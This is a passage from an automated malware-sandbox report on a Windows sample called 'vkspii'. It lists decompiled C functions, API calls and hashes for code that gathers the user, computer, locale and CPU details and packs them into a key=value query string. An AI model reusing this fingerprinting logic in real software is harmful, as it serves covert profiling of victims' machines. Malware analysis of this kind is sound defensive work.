                                      • Opcode Fuzzy Hash: 4b4486b9acf773ae0f847d189a5d2366a2d9619d22d80a8bcc30b947846ab7ea
                                      • Instruction Fuzzy Hash: 5A228570A40305AFEB209FA0CD49FAE7BB5FF04704F10442AF641B62E1D7B9A995CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 98 4069a0-4069b8 99 4069ba-4069da lstrcatW * 4 98->99 100 4069dc-4069df 98->100 99->100 101 4069e1-4069fb lstrcatW * 4 100->101 102 4069fd-406a01 100->102 101->102 103 406a03-406a1d lstrcatW * 4 102->103 104 406a1f-406a23 102->104 103->104 105 406a41-406a45 104->105 106 406a25-406a3f lstrcatW * 4 104->106 107 406a63-406a67 105->107 108 406a47-406a61 lstrcatW * 4 105->108 106->105 109 406a85-406a89 107->109 110 406a69-406a83 lstrcatW * 4 107->110 108->107 111 406aa7-406aab 109->111 112 406a8b-406aa5 lstrcatW * 4 109->112 110->109 113 406ac9-406acd 111->113 114 406aad-406ac7 lstrcatW * 4 111->114 112->111 115 406aeb-406aef 113->115 116 406acf-406ae9 lstrcatW * 4 113->116 114->113 117 406af1-406b0a VirtualAlloc 115->117 118 406b5c-406b60 115->118 116->115 119 406b21-406b2d wsprintfW 117->119 120 406b0c-406b1f wsprintfW 117->120 121 406b62-406b7c lstrcatW * 4 118->121 122 406b7e-406b92 lstrlenW 118->122 123 406b30-406b56 lstrcatW * 4 VirtualFree 119->123 120->123 121->122 123->118
                                      C-Code - Quality: 100%
                                      			E004069A0(intOrPtr* __ecx, WCHAR* _a4) {
                                      				WCHAR* _t47;
                                      				intOrPtr* _t91;
                                      				intOrPtr _t94;
                                      				WCHAR* _t96;
                                      
                                      				_t91 = __ecx;
                                      				_t96 = _a4;
                                      				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
                                      					lstrcatW(_t96,  *(__ecx + 0x88));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x84));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *_t91 != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 4));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 8));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x10));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x14));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x1c));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x20));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x28));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x2c));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x34));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x38));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x40));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x44));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x4c));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x50));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x58));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x5c));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
                                      					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
                                      					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
                                      					_a4 = _t47;
                                      					if(_t94 == 0) {
                                      						wsprintfW(_t47, L"undefined");
                                      					} else {
                                      						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
                                      					}
                                      					lstrcatW(_t96,  *(_t91 + 0x64));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96, _a4);
                                      					lstrcatW(_t96, "&");
                                      					VirtualFree(_a4, 0, 0x8000); // executed
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x78));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x7c));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
                                      				return _t96;
                                      			}







                                      0x004069a4
                                      0x004069a7
                                      0x004069b8
                                      0x004069c1
                                      0x004069c9
                                      0x004069d2
                                      0x004069da
                                      0x004069da
                                      0x004069df
                                      0x004069e5
                                      0x004069ed
                                      0x004069f3
                                      0x004069fb
                                      0x004069fb
                                      0x00406a01
                                      0x00406a07
                                      0x00406a0f
                                      0x00406a15
                                      0x00406a1d
                                      0x00406a1d
                                      0x00406a23
                                      0x00406a29
                                      0x00406a31
                                      0x00406a37
                                      0x00406a3f
                                      0x00406a3f
                                      0x00406a45
                                      0x00406a4b
                                      0x00406a53
                                      0x00406a59
                                      0x00406a61
                                      0x00406a61
                                      0x00406a67
                                      0x00406a6d
                                      0x00406a75
                                      0x00406a7b
                                      0x00406a83
                                      0x00406a83
                                      0x00406a89
                                      0x00406a8f
                                      0x00406a97
                                      0x00406a9d
                                      0x00406aa5
                                      0x00406aa5
                                      0x00406aab
                                      0x00406ab1
                                      0x00406ab9
                                      0x00406abf
                                      0x00406ac7
                                      0x00406ac7
                                      0x00406acd
                                      0x00406ad3
                                      0x00406adb
                                      0x00406ae1
                                      0x00406ae9
                                      0x00406ae9
                                      0x00406aef
                                      0x00406afc
                                      0x00406b02
                                      0x00406b05
                                      0x00406b0a
                                      0x00406b27
                                      0x00406b0c
                                      0x00406b16
                                      0x00406b1c
                                      0x00406b34
                                      0x00406b3c
                                      0x00406b42
                                      0x00406b4a
                                      0x00406b56
                                      0x00406b56
                                      0x00406b60
                                      0x00406b66
                                      0x00406b6e
                                      0x00406b74
                                      0x00406b7c
                                      0x00406b7c
                                      0x00406b88
                                      0x00406b92

                                      APIs
                                      • lstrcatW.KERNEL32(?,?), ref: 004069C1
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 004069C9
                                      • lstrcatW.KERNEL32(?,?), ref: 004069D2
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 004069DA
                                      • lstrcatW.KERNEL32(?,?), ref: 004069E5
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 004069ED
                                      • lstrcatW.KERNEL32(?,?), ref: 004069F3
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 004069FB
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A07
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A0F
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A15
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406A1D
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A29
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A31
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A37
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406A3F
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A4B
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A53
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A59
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406A61
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A6D
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A75
                                      • lstrcatW.KERNEL32(?,004048B6), ref: 00406A7B
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406A83
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A8F
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A97
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A9D
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406AA5
                                      • lstrcatW.KERNEL32(?,?), ref: 00406AB1
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406AB9
                                      • lstrcatW.KERNEL32(?,?), ref: 00406ABF
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406AC7
                                      • lstrcatW.KERNEL32(?,?), ref: 00406AD3
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406ADB
                                      • lstrcatW.KERNEL32(?,?), ref: 00406AE1
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406AE9
                                      • VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,004045E9,00000000,?,00003000,00000040,00000000,?,00000000), ref: 00406AFC
                                      • wsprintfW.USER32 ref: 00406B16
                                      • wsprintfW.USER32 ref: 00406B27
                                      • lstrcatW.KERNEL32(?,?), ref: 00406B34
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406B3C
                                      • lstrcatW.KERNEL32(?,?), ref: 00406B42
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406B4A
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 00406B56
                                      • lstrcatW.KERNEL32(?,?), ref: 00406B66
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406B6E
                                      • lstrcatW.KERNEL32(?,?), ref: 00406B74
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406B7C
                                      • lstrlenW.KERNEL32(?,00000000,00000000,?,?,004045E9,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00406B7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
                                      • String ID: %x%x$undefined
                                      • API String ID: 3872469520-3801831566
                                      • Opcode ID: b4ce8e6092dab11b5570eb4b7fe377be8a76f675d54b5694e6accb4a7b5be685
                                      • Instruction ID: 157d45b09fe4d6cbf2a129cbf998294f04408a9e253f235917979037099c56e6
                                      • Opcode Fuzzy Hash: b4ce8e6092dab11b5570eb4b7fe377be8a76f675d54b5694e6accb4a7b5be685
                                      • Instruction Fuzzy Hash: 80511B31281669B7CB273B658C49FDF3A19EF86700F124061F91028096CFBD9592DEAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
                                        • Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
                                        • Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
                                        • Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
                                        • Part of subcall function 00406D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
                                        • Part of subcall function 00406D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
                                        • Part of subcall function 00406D90: RegCloseKey.ADVAPI32(00000000), ref: 00406ED2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045AC
                                      • lstrcpyW.KERNEL32 ref: 004045CF
                                      • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045D6
                                      • CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045EE
                                      • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045FA
                                      • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404601
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040461B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
                                      • String ID: Global\
                                      • API String ID: 3131499543-188423391
                                      • Opcode ID: 60700ccbb66975790bdd6c2481cc6c90d6354a02fbe93d1c0f5e8eb0fcf3caff
                                      • Instruction ID: 4f5a3050133a9d70e6d79b6919bbb594e2943cbf5e181e58d482f905f9ddffb5
                                      • Opcode Fuzzy Hash: 60700ccbb66975790bdd6c2481cc6c90d6354a02fbe93d1c0f5e8eb0fcf3caff
                                      • Instruction Fuzzy Hash: 6721D4B16503217BE224A724DC4BF6F7A5CDB80744F500639F706761D0EAB87D0486EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 198 407720-40772d 199 40773b-40773f 198->199 200 40772f-407739 VirtualFree 198->200 201 407741-40774b VirtualFree 199->201 202 40774d-407751 199->202 200->199 201->202 203 407753-40775d VirtualFree 202->203 204 40775f-407763 202->204 203->204 205 407771-407775 204->205 206 407765-40776f VirtualFree 204->206 207 407783-407787 205->207 208 407777-407781 VirtualFree 205->208 206->205 209 407795-407799 207->209 210 407789-407793 VirtualFree 207->210 208->207 211 4077a7-4077ab 209->211 212 40779b-4077a5 VirtualFree 209->212 210->209 213 4077b9-4077bd 211->213 214 4077ad-4077b7 VirtualFree 211->214 212->211 215 4077cb-4077d2 213->215 216 4077bf-4077c9 VirtualFree 213->216 214->213 217 4077e3-4077e5 215->217 218 4077d4-4077e1 VirtualFree 215->218 216->215 218->217
                                      C-Code - Quality: 100%
                                      			E00407720(intOrPtr* __ecx) {
                                      				int _t20;
                                      				intOrPtr* _t24;
                                      
                                      				_t24 = __ecx;
                                      				if( *__ecx != 0) {
                                      					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
                                      					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
                                      				}
                                      				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
                                      					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
                                      				}
                                      				return _t20;
                                      			}





                                      0x00407721
                                      0x0040772d
                                      0x00407739
                                      0x00407739
                                      0x0040773f
                                      0x0040774b
                                      0x0040774b
                                      0x00407751
                                      0x0040775d
                                      0x0040775d
                                      0x00407763
                                      0x0040776f
                                      0x0040776f
                                      0x00407775
                                      0x00407781
                                      0x00407781
                                      0x00407787
                                      0x00407793
                                      0x00407793
                                      0x00407799
                                      0x004077a5
                                      0x004077a5
                                      0x004077ab
                                      0x004077b7
                                      0x004077b7
                                      0x004077bd
                                      0x004077c9
                                      0x004077c9
                                      0x004077d2
                                      0x00000000
                                      0x004077e1
                                      0x004077e5

                                      APIs
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407739
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040774B
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040775D
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040776F
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407781
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407793
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077A5
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077B7
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077C9
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077E1
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 3fc008402963f2d3cbecf3a86f23b2e7ee5b4610d3041296055b4ddd3abf16a0
                                      • Instruction ID: 79a2428a1de1d862086b34f36251e2aa8ec78ad52842245a2806986d354140b0
                                      • Opcode Fuzzy Hash: 3fc008402963f2d3cbecf3a86f23b2e7ee5b4610d3041296055b4ddd3abf16a0
                                      • Instruction Fuzzy Hash: C7211C30280B04AAF7762B15CC4AF66B2E1BB40B45F254839F2C1395F08BF97889DF09
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E00406D10(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
                                      				void* _v8;
                                      				long _t14;
                                      				long _t18;
                                      
                                      				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
                                      				if(_t14 != 0) {
                                      					return 0;
                                      				} else {
                                      					_a8 = _a20;
                                      					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
                                      					if(_t18 != 0) {
                                      						GetLastError();
                                      						RegCloseKey(_v8);
                                      						return 0;
                                      					} else {
                                      						_t11 = _t18 + 1; // 0x1, executed
                                      						RegCloseKey(_v8); // executed
                                      						return _t11;
                                      					}
                                      				}
                                      			}






                                      0x00406d26
                                      0x00406d30
                                      0x00406d84
                                      0x00406d32
                                      0x00406d35
                                      0x00406d47
                                      0x00406d4f
                                      0x00406d66
                                      0x00406d6f
                                      0x00406d7b
                                      0x00406d51
                                      0x00406d54
                                      0x00406d57
                                      0x00406d63
                                      0x00406d63
                                      0x00406d4f

                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,00000000,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D26
                                      • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000080,?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D47
                                      • RegCloseKey.KERNELBASE(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D57
                                      • GetLastError.KERNEL32(?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D66
                                      • RegCloseKey.ADVAPI32(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D6F
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$ErrorLastOpenQueryValue
                                      • String ID:
                                      • API String ID: 2437438455-0
                                      • Opcode ID: 9e6bb54fed31df0af1995cc1e5d9b2912871e352615202f1e244d14966f57426
                                      • Instruction ID: 038fbdeb07fc8f9d94efb3036f8b9b37cf4c52d37effb2f9ef8d9ff464795a08
                                      • Opcode Fuzzy Hash: 9e6bb54fed31df0af1995cc1e5d9b2912871e352615202f1e244d14966f57426
                                      • Instruction Fuzzy Hash: 3D011A7260011CABCB209F94EE09DDA7B7CEF08351F008162FD05E6121D7329E20EBE4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 224 404af0-404af3 call 4048a0 226 404af8-404afa ExitProcess 224->226
                                      C-Code - Quality: 100%
                                      			_entry_() {
                                      				void* _t2;
                                      
                                      				E004048A0(_t2); // executed
                                      				ExitProcess(0);
                                      			}




                                      0x00404af3
                                      0x00404afa

                                      APIs
                                        • Part of subcall function 004048A0: Sleep.KERNELBASE(000003E8), ref: 004048AB
                                        • Part of subcall function 004048A0: ExitProcess.KERNEL32 ref: 004048BC
                                      • ExitProcess.KERNEL32 ref: 00404AFA
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$Sleep
                                      • String ID:
                                      • API String ID: 1320946285-0
                                      • Opcode ID: 1f204cbbbf4b91cb41731de12bafb510547bb58fbcebeb620ebc01891cafb445
                                      • Instruction ID: 1b19d15e4aeeb9909d6bd86e0db19be6c339a400cc2da824b43fea8bc324f338
                                      • Opcode Fuzzy Hash: 1f204cbbbf4b91cb41731de12bafb510547bb58fbcebeb620ebc01891cafb445
                                      • Instruction Fuzzy Hash: 56A011302082080AE0803BA2A80AB0A320C0B00A02F800030A208A80C208A8280080AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
